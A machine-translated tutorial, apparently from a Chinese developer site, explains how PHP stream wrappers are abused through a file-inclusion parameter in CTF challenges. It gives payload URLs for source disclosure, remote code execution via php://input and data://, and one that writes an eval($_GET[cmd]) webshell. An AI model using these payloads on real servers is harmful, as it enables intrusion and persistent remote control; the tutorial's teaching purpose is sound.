当前位置:网站首页>PHP pseudo protocol implementation command execution details
PHP pseudo protocol implementation command execution details
2022-06-10 21:50:00 【1024 Q】
1.file:// agreement
2.php:// agreement
3.data:// agreement
4.zip:// & bzip:// & zlib:// agreement
summary
1.file:// agreementConditions :
allow_url_fopen : off/onallow_url_include: off/oneffect :
Used to access the local file system , stay ctf Is usually used to read local files
stay include() / require() / include_once() / require_once() The parameters are controllable , Even if import is not .php file , Such as shell.txt , Still, in accordance with the php Grammar for parsing , This is a include() Function
explain :
file:// The file system is php Default encapsulation protocol used , Used to show the local file system .
usage :
/path/to/file.extrelative/path/to/file.extfileInCwd.extC:/path/to/winfile.extC:\path\to\winfile.ext\\smbserver\share\path\to\winfile.extfile:///path/to/file.extExample :
1.file://[ The absolute path and filename of the file ]
http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt2.file://[ Relative path and file name of the file ]
http://127.0.0.1/include.php?file=./phpinfo.txt3.http:// Network location and file name
http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt2.php:// agreement Conditions :
allow_url_open : off/onallow_url_include: only php://input php://stdin php://memory php://temp need oneffect :
php:// Access individual inputs / Output stream (I/O streams), stay ctf Often used in php://filter and php://input
php://filter For reading source code php://input Used to perform php Code explain :
php Some miscellaneous inputs are provided / Output (IO) flow , allow access to PHP I / O stream , Standard I / O streams and error descriptors :
php://filter Use :
php://filter/read=convert.base64-encode/resource=[ file name ]php://input Use :
http://127.0.0.1/include.php?file=php://input [POST DATA part ]<?php phpinfo(); ?>Write a sentence
http://127.0.0.1/include.php?file=php://input[POST DATA part ]<?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>3.data:// agreement effect :
php>=5.2.0 , have access to data:// Data flow wrapper , To transfer data in the corresponding format . Usually used to perform php Code
usage :
data://text/plain, ???Such as :
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>4.zip:// & bzip:// & zlib:// agreement effect :
zip:// & bzip:// & zlib:// All belong to compressed flow , You can access sub files in a compressed file , More importantly, you don't need to specify a suffix , It can be modified to any suffix , Such as jpg,png,gif,xxx etc.
Example :
1.zip://[ Compressed file absolute path ]%23[ The name of the sub file in the compressed file ](# The code of is %23)
Compress phpinfo.txt by phpinfo.zip , Rename the package to phpinfo.jpg , And upload
http://127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt2.compress.bzip2://file.bz2
Compress phpinfo.txt by phpinfo.bz2 And upload ( Any suffix is also supported )
http://127.0.0.1/include.php?file=compress.bzip2://E:\phpStudy\PHPTutorial\WWW\phpinfo.bz23.compress.zlib://file.gz
Compress phpinfo.txt by phpinfo.gz And upload ( Supports any suffix )
http://127.0.0.1/include.php?file=compress.zlib://E:\phpStudy\PHPTutorial\WWW\phpinfo.gz summary stay ctf The most common ones in English are data:// , php://input , php://filter ,file://
php://input ,data:// To execute commands 1.php://input Usage of http://127.0.0.1/include.php?file=php://input[POST DATA part ]<?php phpinfo(); ?>2.data:// usage http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>php://filter,file:// Used to read files 3.php://filter usage http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php( Read php The file needs to be encrypted before it can be read out )http://127.0.0.1/include.php?file=php://filter/resource=/flag4.file:// usage http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txtThis is about php This is the end of the pseudo protocol implementation command execution details article , More about php Please search the previous articles of the software development network or continue to browse the relevant articles below. I hope you can support the software development network in the future !
边栏推荐
- Brute force method / adjacency table depth first directed weighted graph undirected weighted graph
- Interview Essentials - basic knowledge of synchronized underlying principles
- SoC development environment and hardware development preparation
- 01js basic null and undefined difference type conversion = = code block logical operator
- Use DAP link to download the executable file separately to the mm32f5 microcontroller
- LeetCode 进阶之路 - 字符串中的第一个唯一字符
- Leetcode advanced road - 136 A number that appears only once
- An analysis of SQL query optimization principle (900w+ data from 17s to 300ms)
- Leetcode advanced path - delete duplicates in the sorting array
- [qingniaochangping campus of Peking University] the coordinated development of vocational education and general education, will this year's high school entrance examination be easy?
猜你喜欢
C language -- 8 familiar keywords
Acl2022 | bert2bert: an efficient pre training method of parameter reuse, which significantly reduces the training cost of oversized models
Qingniao Changping campus of Peking University: can I learn UI with a high school degree?
As a programmer, is it really that important for the underlying principles?
What should be paid attention to when designing Multilayer PCB?
Introduction to database system -- Chapter 1 -- Introduction (important knowledge points)
微积分复习1
一次SQL查询优化原理分析(900W+数据从17s到300ms)
C language -- 11 branch statement if else
![[Warning] TIMESTAMP with implicit DEFAULT value is deprecated](/img/e8/53c18a7944d160238f2f1c0f8f04b1.jpg)
[Warning] TIMESTAMP with implicit DEFAULT value is deprecated
随机推荐
Video monitoring system storage control, bandwidth calculation method
实用 | 如何利用 Burp Suite 进行密码爆破!
CCF class a conference or journal - regression related papers
C language -- 4 first-time constant
C language -- 10 first knowledge of structure
A small case with 666 times performance improvement illustrates the importance of using indexes correctly in tidb
app測試用例
Rotate menu 3.0
As a programmer, is it really that important for the underlying principles?
【无标题】破目
数据库系统概论 ---- 第一章 -- 绪论(重要知识点)
CentOS7安装MySQL8的超级详细教程(无坑!)
Obtained network time + time zone (+8)
Leetcode advanced path - Search insertion location
C language -- 3 variables for beginners
LeetCode 进阶之路 - 136.只出现一次的数字
ThinkPHP v6.0.x反序列化漏洞复现
php伪协议实现命令执行详情
Whether there is a simple path from brute force method /u to V
Redis cache penetration